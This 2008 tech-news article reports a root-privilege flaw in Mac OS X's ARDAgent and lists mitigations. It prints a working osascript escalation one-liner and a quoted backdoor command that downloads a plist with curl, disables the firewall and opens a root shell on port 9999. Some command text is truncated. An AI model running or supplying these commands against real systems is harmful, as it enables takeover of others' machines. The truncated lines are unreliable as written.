In association with heise online

20 June 2008, 10:58

Root exploit for Mac OS X

  • Twitter
  • Facebook
  • submit to slashdot
  • StumbleUpon
  • submit to reddit

A vulnerability in Mac OS X 10.4 and 10.5 makes it easy for potential attackers to obtain root rights to a system. The ARDAgent – Apple Remote Desktop – part of Remote Management has the SUID bit set. ARDAgent is able to run AppleScript with root rights and these, in turn, may contain shell commands – all without requiring a password.

To demonstrate the problem as a standard user or guest on a computer, type osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; into the console. Physical access to a system is not required for an attack to be successful. In principle, the exploit will also work remotely, say on a server on which a user has a restricted account with SSH access.

A suggestion of how this could be exploited to implement a backdoor has already been posted on Slashdot. When tested at heise Security, the line osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist [] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start ; ipfw disable firewall; launchctl "' opened a root shell at TCP port 9999.

Several ways to solve the problem have now been suggested. The exploit doesn't work if the "Remote Management" option is enabled under Mac OS X 10.5 "System Settings/Sharing/" – but this is not the default setting. Neither does it work if the Apple Remote Desktop client has been installed and enabled under Mac OS X 10.4. Other suggestions are to completely remove the Apple Remote Desktop, to compress the file, or to delete the SUID bit in ARDAgent chmod u-s /System/Library/CoreServices/RemoteManagement/ ent.

See also:


Print Version | Send by email | Permalink:

  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit